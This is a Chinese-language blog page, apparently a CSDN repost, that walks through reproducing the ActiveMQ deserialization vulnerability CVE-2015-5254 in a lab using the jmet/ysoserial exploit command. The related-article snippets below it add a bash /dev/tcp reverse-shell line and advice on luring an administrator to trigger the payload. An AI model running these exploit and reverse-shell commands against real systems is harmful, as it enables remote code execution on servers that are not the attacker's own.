Apache ActiveMQ序列化漏洞(CVE-2015-5254)复现

最新推荐文章于 2024-05-18 11:30:07 发布
最新推荐文章于 2024-05-18 11:30:07 发布
阅读量423 收藏
点赞数
文章标签: java
原文链接:http://www.cnblogs.com/yuzly/p/11278073.html
版权

Apache ActiveMQ序列化漏洞(CVE-2015-5254)复现

一、漏洞描述

该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。

二、漏洞影响版本

Apache ActiveMQ 5.13.0之前的版本

三、漏洞环境搭建

1、官网下载ActiveMQ 5.11.1版本下载地址:http://activemq.apache.org/download-archives.html

2、解压

  

3、启动,进入bin目录下,运行./activemq start

查看是否启动成功,./activemq status

  

4、浏览器访问http://192.168.10.149:8161/,如下图可以看到成功搭建环境

  

四、漏洞复现

1、 漏洞利用过程如下:

a.构成(使用ysoserial)可执行命令的序列化对象

b.作为一个消息,发送给目标的61616端口

c.访问web管理页面,读取消息,触发漏洞

2、下载jmet的jar文件,下载地址为: https://github.com/matthiaskaiser/jmet,复制到kali的/opt目录下,并在当前目录下创建一个external文件夹。Jmet原理是使用ysoserial生成payload并发送(其jar内自带ysoserial,无需再自己下载),所以我们需要在ysoserial是gadget中选择一个可以使用的,比如ROME。

  

3、执行如下命令

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/sucess" -Yp ROME   192.168.10.149   61616

  

4、此时会给目标的ActiveMQ添加一个名为事件的队列,通过访问http://192.168.10.149:8161/admin/browse.jsp?JMSDestination=event看到这个队列中所有的消息

  

5、点击查看这条消息即可触发命令执行

  

6、此刻查看/tmp/,已经成功创建,说明漏洞利用成功

  

 

转载于:https://www.cnblogs.com/yuzly/p/11278073.html

WY92139010
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2015-5254(ActiveMQ序列化漏洞复现)
Sea_Sand息禅
07-13 2876
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息间件,它支持Java消息服务、集群、Spring Framework等。由于ActiveMQ一个Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。 Apache ActiveMQ 5.13.0之前5.x版本存在安全漏洞,该漏洞源于程序没有限制可在代理序列化的类。远程攻击者...
ActiveMQ序列化漏洞CVE-2015-5254)利用工具
08-15
2015年,ActiveMQ被发现存在一个严重的安全漏洞,被称为CVE-2015-5254,这是一个序列化漏洞,允许攻击者通过精心构造的恶意消息来执行任意代码,从而对目标系统造成重大威胁。 反序列化漏洞通常发生在对象从...
ActiveMQ序列化漏洞CVE-2015-5254复现
Cwillchris的博客
03-31 7760
准备两个linux虚拟机,一个为目标机(,以下简称A,ip:192.168.98.30),一个为攻击机(以下简称B,ip:192.168.98.70) 先搭建靶场,打开A,教程在这里vulhub靶场搭建及漏洞复现教程_Cwillchris的博客-CSDN博客 服务器A的生产端口(即用户可访问端口)为61616,管理端端口(后台)为8161 打开A 1、进入该漏洞环境所在目录 cd /root/desktop/vulhub/activemq/CVE-2015-5254 2、启动docker
CVE-2015-5254复现学习
shierbai的博客
05-18 461
使用[jmet](https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar)进行漏洞利用。影响版本:Apache ActiveMQ 5.13.0之前5.x版本,https://www.cvedetails.com/cve/CVE-2015-5254/实际环境下,需要诱导管理员点击我们构造的url去做访问,触发反弹条件。bash -i>/dev/tcp/攻击机ip/1234(监听端口) 0>&1。
ActiveMQ序列化漏洞(CVE-2015-5254)复现
baidu_38844729的博客
01-22 524
前言 Apache ActiveMQ 5.13.0之前5.x版本存在安全漏洞,该漏洞源于程序没有限制可在代理序列化的类。远程攻击者可借助特制的序列化Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码 步骤 搭建环境:docker+vulhub 1.下载jmet的jar文件,并在同目录下创建一个external文件夹 链接:https://g...
ActiveMQ序列化漏洞 getshell(CVE-2015-5254)——漏洞复现
W小哥
11-10 3712
一、ActiveMQ介绍 1.1 简介 Apache的一款JAVA开源消息间件,支持Java消息服务、集群、SpringFrameword等。属于消息队列组件。 (消息队列组件:分布式系统的重要组件,主要解决应用耦合、异步消息、流量削峰等) 1.2 漏洞影响版本 Apache ActiveMQ < 5.13.0 之前 5.x版本 1.3 漏洞成因 漏洞没有限制在代理序列化的类,远程攻击者可以借助特制的序列化Java消息服务(JMS)ObjectMessage对象利用该漏洞执行恶意代码。 1.
ActiveMQ序列化漏洞 (CVE-2015-5254) 漏洞复现
wswr的博客
03-04 1169
前提环境(我是照着这个师傅来的):kali下搭建Vulhub靶场(详细附图)_看我的眼色行事的博客-CSDN博客_kali搭建靶场 原理:Apache ActiveMQ 5.x 5.13.0 之前的安全漏洞,程序造成的漏洞不限制代理可以序列化的类。远程攻击者可以使一个特殊的序列化 Java 消息服务 (JMS) ObjectMessage 对象利用此漏洞执行任意代码。 Active MQ 理解成一种apache上的服务,作用的是提供程序通信的服务。那么我的感觉就是这个漏洞可以理解成,这个代理服务在帮忙
ActiveMQ序列化漏洞CVE-2015-5254漏洞利用工具
11-25
ActiveMQ序列化漏洞CVE-2015-5254漏洞利用工具,说明文档已存在请进行查看
apache-activemq-5.16.5-bin.tar.gz 下载(5积分)
08-17
Apache ActiveMQApache软件基金会的一个开源项目,是一个基于消息的通信间件。ActiveMQ是JMS的一个具体实现,支持JMS的两种消息模型。ActiveMQ使用AMQP协议集成多平台应用,使用STOMP协议通过websockets在Web...
apache-activemq-5.16.6-bin.zip
12-26
这个"apache-activemq-5.16.6-bin.zip"文件包含了ActiveMQ的最新稳定版本5.16.6的二进制发行版,主要用于在各种环境部署和运行。 **Apache ActiveMQ核心概念** 1. **消息队列(Message Queue)**: 消息队列是...
apache-activemq-5.10到apache-activemq6.1大版本合集
最新发布
07-31
apache-activemq-5.10.2-bin.tar.gz apache-activemq-5.11.4-bin.zip apache-activemq-5.12.3-bin.zip apache-activemq-5.13.5-bin.zip apache-activemq-5.14.5-bin.zip apache-activemq-5.15.9-bin.zip apache-...
ActiveMQ序列化漏洞CVE-2015-5254漏洞复现
chenming08的博客
04-26 552
5、下载jmet-0.1.0-all.jar(时间较长):https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar(攻击机)6、执行java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y “touch /tmp/sucess” -Yp ROME 你的IP 61616(攻击机)实验环境:攻击机----kali。3、启动环境(靶机)
ActiveMQ序列化漏洞 (CVE-2015-5254)复现
qq_45314073的博客
09-16 1489
ActiveMQ序列化漏洞
ActiveMQ序列化漏洞CVE-2015-5254复现
qq_40708881的博客
12-10 314
ActiveMQ序列化漏洞CVE-2015-5254复现 导语 Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息间件,它支持Java消息服务、集群、Spring Framework等。 Apache ActiveMQ 5.13.0之前5.x版本存在安全漏洞,该漏洞源于程序没有限制可在代理序列化的类。远程攻击者可借助特制的序列化Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。 漏洞环境 git
CVE-2015-5254ActiveMQ序列化漏洞复现
p_utao的博客
03-19 400
漏洞介绍 Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ5.13.0之前5.x版本存在安全漏洞,该漏洞源于程序没有限制可在代理序列化的类。远程攻击者可借助特制的序列化Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。 漏洞复现 http://10.7.10.41:8161/admin 默认账号密码:admin 登陆成功
ActiveMQ序列化漏洞 (CVE-2015-5254)
m0_74402888的博客
04-30 1315
1.在IDEA建立好了SpringBoot项目,并配置好了docker容器,然后在执行Dockerfile时出现以下问题Get https://registry-1.docker.io/v2/: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting head..._registry-1.docker.io。其61616端口是工作端口,消息在这个端口上传递;
ActiveMQ序列化漏洞CVE-2015-5254
Kevin's Blog
06-02 1813
文章目录一、介绍1.1 简介1.2 影响版本1.3 漏洞成因1.4 利用限制1.4 业务场景1.5 使用概率二、模拟环境三、漏洞利用3.1 信息收集3.2 漏洞复现 一、介绍 1.1 简介   Apache的一款JAVA开源消息间件,支持Java消息服务、集群、SpringFrameword等。属于消息队列组件。 消息队列组件:分布式系统的重要组件,主要解决应用耦合、异步消息、流量削峰等 1.2 影响版本 Apache ActiveMQ < 5.x 1.3 漏洞成因   漏洞没有限制在代理
CVE-2015-5254漏洞复现
2201_75761617的博客
08-19 301
Apache ActiveMQ 是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息间件,它支持 Java 消息服务,集群,Spring Framework 等。值得注意的是,通过web管理页面访问消息并触发漏洞这个过程需要管理员权限。在没有密码的情况下,我们可以诱导管理员访问我们的链接以触发,或者伪装成其他合法服务需要的消息,等待客户端访问的时候触发。至此,一个权限为root,密码为123456的用户被我们创建成功,之后可以直接进行ssh远程连接。(1)访问web界面并进行登录。
ActiveMQ--CVE-2015-5254
weixin_37639863的博客
02-17 921
ActiveMQ序列化漏洞CVE-2015-5254复现 - 渗透测试心 - 博客园0x00 漏洞前言 Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息间件,它支持Java消息服务,集群,Spring Framework等。Apache Ahttps://www.cnblogs.com/backlion/p/9970516.htmlActiveMQ序列化漏洞复现CVE-2015-5254)_浮生一世暖流年的博客-CSDN博客环境搭建使用vulhub搭
activemq哪些版本解决了CVE-2022-2048漏洞
06-10
CVE-2022-2048是ActiveMQ一个安全漏洞,这个漏洞可以允许攻击者通过发送特制的消息来执行任意代码。Apache ActiveMQ从5.15.16开始修复了这个漏洞。因此,如果你使用的是Apache ActiveMQ 5.15.16或更高版本,则已经...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值